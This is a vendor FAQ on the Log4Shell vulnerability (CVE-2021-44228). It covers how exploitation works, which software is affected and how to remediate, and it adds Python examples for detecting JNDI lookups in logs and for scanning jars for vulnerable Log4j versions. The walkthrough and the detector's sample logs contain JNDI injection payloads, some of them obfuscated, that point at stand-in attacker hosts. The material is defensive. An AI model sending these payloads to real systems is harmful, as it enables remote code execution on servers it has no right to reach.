
Log4j Vulnerability FAQs

We know you may have questions, so here are answers to some of the ones we are asked most often.

What happened?

On 9 December 2021, a critical remote code execution vulnerability in the Apache Log4j 2 logging library (CVE-2021-44228, widely referred to as "Log4Shell") became public. It affects Log4j versions 2.0-beta9 through 2.14.1. The Apache Software Foundation released Log4j 2.15.0 to resolve the vulnerability; that fix was later found to be incomplete in some non-default configurations (CVE-2021-45046), and further releases (2.16.0, 2.17.0 and 2.17.1) addressed related, less severe issues, so the current 2.17.x release or later should be used. Log4j 1.x is a separate code base and is not affected by CVE-2021-44228, although it is end of life and has other known issues.

How serious is it?

Because it allows unauthenticated remote code execution across a very wide range of software products, this is considered a critical vulnerability (CVSS 10.0). Any threat actor who can control the content of a log message or a log message parameter can use it to run arbitrary code with the privileges of the affected Java process, which in practice often means full control of the affected server. There have been numerous reports of threat actors using this vulnerability to deploy cryptominers and other malware.

How does exploitation of this vulnerability work?

The vulnerability lies in how Log4j processes log messages. Before a message is written, Log4j 2 expands any ${...} lookup expressions it contains, and one of those lookups, jndi, lets the message direct the Java runtime to fetch an object from a remote server. By sending a specially crafted string to a system that logs it, a threat actor can therefore cause the system to download and run external code, an outcome known as remote code execution.

This is how an attack could potentially work:

  1. The threat actor submits a specially crafted string containing a malicious payload to a system that is vulnerable to CVE-2021-44228. The string can arrive through any field that the system logs, such as a User-Agent string, Referer header, username or email address, device name, or free-text input, and is often obfuscated (for example ${${lower:j}ndi:...} or URL-encoded) to evade simple string matching.
  2. The string, which might be something like ${jndi:ldap://attacker.com/a}, where attacker.com is a threat actor-controlled LDAP server, is passed to Log4j for logging.
  3. Log4j expands the lookup, and the vulnerable system uses JNDI to query the threat actor-controlled LDAP server.
  4. The threat actor-controlled LDAP server responds with a reference to a remote Java class file (e.g., hXXp://second-stage.attacker.com/Exploit.class), or with serialized Java object data.
  5. The vulnerable Java runtime downloads, loads and instantiates that class (or deserializes the object), so the threat actor's code runs with the privileges of the application.

Loading a remote class from an LDAP reference requires the JVM property com.sun.jndi.ldap.object.trustURLCodebase to be true, which is the default only on older Java releases (it was turned off in Java 8u191 and 11.0.1). On newer runtimes attackers rely instead on serialized objects in the LDAP response or on "gadget" classes already present on the application's classpath, so an up-to-date Java runtime reduces the risk but does not remove it.
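Detection logic for the payload shapes described above, as an added example written for this page rather than code from the original FAQ or from the Log4j project. It scans constructed sample access-log lines (the addresses and the attacker.example hostnames are invented) for JNDI lookups, first undoing the obfuscations attackers use to get past naive matching: URL encoding and the Log4j ${lower:...}, ${upper:...} and ${...:-default} substitutions, so that ${${lower:j}ndi:...} and ${${::-j}${::-n}${::-d}${::-i}:...} are recognised as ${jndi:...}.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from any real system). Lines 1 and 6
# are benign; lines 2-5 carry CVE-2021-44228 payloads in the User-Agent or the
# request path, using the obfuscation tricks seen in the wild.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:L}${lower:d}ap://attacker.example/b}"',
    '203.0.113.11 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '203.0.113.13 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.15 - - [10/Dec/2021:12:00:06 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

# An innermost ${...} lookup: nothing between the braces may itself contain '$', '{' or '}'.
INNER_LOOKUP = re.compile(r'\$\{([^${}]*)\}')
# A JNDI lookup and the protocol it asks the JVM to use (ldap, ldaps, rmi, dns, ...).
JNDI_LOOKUP = re.compile(r'\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:', re.IGNORECASE)


def _resolve_inner(match):
    """Evaluate one innermost lookup the way Log4j 2.x substitution would, for the
    lookups attackers use to spell 'jndi' piecewise. Anything else (jndi:, date:,
    env: ...) is returned unchanged so the detector below can see it."""
    body = match.group(1)
    if ':-' in body:                       # ${x:y:-default} evaluates to 'default' (also ${::-j})
        return body.split(':-', 1)[1]
    name, sep, arg = body.partition(':')
    if sep and name.strip().lower() == 'lower':
        return arg.lower()
    if sep and name.strip().lower() == 'upper':
        return arg.upper()
    return match.group(0)


def normalize(text):
    """URL-decode and resolve innermost lookups, repeating until nothing changes
    (handles double encoding and arbitrarily deep nesting)."""
    previous = None
    while previous != text:
        previous = text
        text = INNER_LOOKUP.sub(_resolve_inner, unquote(text))
    return text


def find_jndi_lookups(line):
    """Lower-cased scheme of every JNDI lookup found in one log line after de-obfuscation."""
    return [m.group('scheme').lower() for m in JNDI_LOOKUP.finditer(normalize(line))]


def scan(lines):
    """(1-based line number, schemes) for every line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        schemes = find_jndi_lookups(line)
        if schemes:
            hits.append((number, schemes))
    return hits


if __name__ == '__main__':
    for number, schemes in scan(SAMPLE_LOGS):
        print(f'line {number}: JNDI lookup via {", ".join(schemes)}')
```

A hit means an exploitation attempt reached a component that logs that field, not that it succeeded; the confirming signal is outbound LDAP, RMI or HTTP traffic from the Java process to the host named in the payload, so pair this with egress logs or a deny-by-default egress policy.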

What software is affected?

It is impossible to produce a definitive list of all the potentially affected software. Log4j 2 is embedded in a very wide range of products, including many that are not obviously Java-based, so vendor lists are the starting point rather than the whole answer. A comprehensive list of currently known applications and vendors can be found here, and NCSC has also released a non-exhaustive list of vulnerable products that you can find here. Even where a product is not listed, any Java-based software you run should be checked for a bundled log4j-core jar in the affected version range (2.0-beta9 through 2.14.1).
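The local check that complements those lists, as an added example written for this page (it is not the FAQ's own tooling or Apache's): a scanner that walks a directory tree, recurses into jar, war and ear files, reads the Maven pom.properties that ships inside log4j-core to get its version, and checks whether JndiLookup.class is present (deleting that class from the jar was the Apache project's stated mitigation for deployments that could not upgrade). The fixtures it scans are constructed fake jars containing only those two entries, and the version thresholds assume the first fixed releases on each branch, 2.3.1 (Java 6 line), 2.12.2 (Java 7 line) and 2.15.0 (main line).

```python
import io
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = 'org/apache/logging/log4j/core/lookup/JndiLookup.class'
LOG4J_CORE_POM = 'META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties'
ARCHIVE_SUFFIXES = ('.jar', '.war', '.ear', '.zip')


def version_key(version):
    """'2.14.1' -> (2, 14, 1, 0); a pre-release such as '2.0-beta9' sorts below its base."""
    base, _, suffix = version.partition('-')
    nums = [int(n) for n in re.findall(r'\d+', base)][:3]
    nums += [0] * (3 - len(nums))
    return tuple(nums) + ((-1,) if suffix else (0,))


def classify(version, has_jndi_lookup):
    """CVE-2021-44228 status of one log4j-core artifact (thresholds per the lead-in)."""
    if version == 'unknown':
        return 'log4j-core detected but version unknown (shaded or repackaged): inspect manually'
    v = version_key(version)
    if v[0] != 2:
        return 'not affected by CVE-2021-44228 (Log4j 1.x is a different code base)'
    if v < version_key('2.4'):            # Java 6 maintenance line
        fixed = version_key('2.3.1')
    elif v < version_key('2.13'):         # Java 7 maintenance line
        fixed = version_key('2.12.2')
    else:                                 # main line
        fixed = version_key('2.15.0')
    if v >= fixed:
        return 'fixed for CVE-2021-44228 (check the later follow-up CVEs separately)'
    if not has_jndi_lookup:
        return 'vulnerable version but JndiLookup.class removed (mitigated)'
    return 'VULNERABLE to CVE-2021-44228'


def inspect_archive(zf, label):
    """Yield (label, version, has_jndi_lookup) for every log4j-core in an open zip,
    recursing into nested archives (e.g. WEB-INF/lib/*.jar inside a .war)."""
    names = set(zf.namelist())
    has_jndi = JNDI_LOOKUP_CLASS in names
    if LOG4J_CORE_POM in names or has_jndi:
        version = 'unknown'
        if LOG4J_CORE_POM in names:
            props = zf.read(LOG4J_CORE_POM).decode('utf-8', 'replace')
            m = re.search(r'^version=(.+)$', props, re.MULTILINE)
            version = m.group(1).strip() if m else 'unknown'
        yield label, version, has_jndi
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            with inner:
                yield from inspect_archive(inner, f'{label}!{name}')


def scan_tree(root):
    """Walk a directory tree; return sorted (path, version, has_jndi_lookup, status)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for filename in files:
            full = os.path.join(dirpath, filename)
            if not filename.lower().endswith(ARCHIVE_SUFFIXES) or not zipfile.is_zipfile(full):
                continue
            with zipfile.ZipFile(full) as zf:
                for label, version, has_jndi in inspect_archive(zf, os.path.relpath(full, root)):
                    findings.append((label, version, has_jndi, classify(version, has_jndi)))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed fixtures (not real artifacts): jars holding only the entries the scanner reads."""
    def write_log4j_core(target, version, keep_jndi_lookup=True):
        with zipfile.ZipFile(target, 'w') as zf:
            zf.writestr(LOG4J_CORE_POM, f'artifactId=log4j-core\nversion={version}\n')
            if keep_jndi_lookup:
                zf.writestr(JNDI_LOOKUP_CLASS, b'\xca\xfe\xba\xbe')   # class-file magic only
    lib = os.path.join(root, 'lib')
    os.makedirs(lib)
    write_log4j_core(os.path.join(lib, 'log4j-core-2.14.1.jar'), '2.14.1')
    write_log4j_core(os.path.join(lib, 'log4j-core-2.14.1-stripped.jar'), '2.14.1', keep_jndi_lookup=False)
    nested = io.BytesIO()
    write_log4j_core(nested, '2.17.1')
    with zipfile.ZipFile(os.path.join(root, 'app.war'), 'w') as war:
        war.writestr('WEB-INF/lib/log4j-core-2.17.1.jar', nested.getvalue())
    with zipfile.ZipFile(os.path.join(lib, 'commons-io.jar'), 'w') as other:
        other.writestr('org/example/Unrelated.class', b'\xca\xfe\xba\xbe')


def demo():
    """Build the fixtures in a temporary directory, scan them and return the findings."""
    root = tempfile.mkdtemp(prefix='log4j-scan-')
    build_sample_tree(root)
    return scan_tree(root)


if __name__ == '__main__':
    for path, version, has_jndi, status in demo():
        print(f'{path}: log4j-core {version}, JndiLookup.class '
              f'{"present" if has_jndi else "absent"} -> {status}')
```

Point scan_tree at an application root or a container image layer to inventory real systems; the "version unknown" branch matters because vendors often shade Log4j into their own jars without the pom.properties, and those copies are exactly the ones a vendor list will not tell you about.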

What should I do next?

We are currently working with vendors to ensure customers are aware of any patches/mitigations that are released. Circle’s technical teams have been testing the remediation on a number of key supported systems, and our customers have been contacted directly regarding these. We are continuing to monitor the situation and will communicate any updates to our customers. In general, the remediation is to apply the vendor's patch or upgrade to the current Log4j 2 release (2.17.x or later); where an upgrade is not yet possible, the Apache project's mitigation is to remove the JndiLookup class from the log4j-core jar. Setting the log4j2.formatMsgNoLookups property only works on versions 2.10 and later and was later shown not to cover every configuration, so it should not be relied on as the sole fix.

Further questions?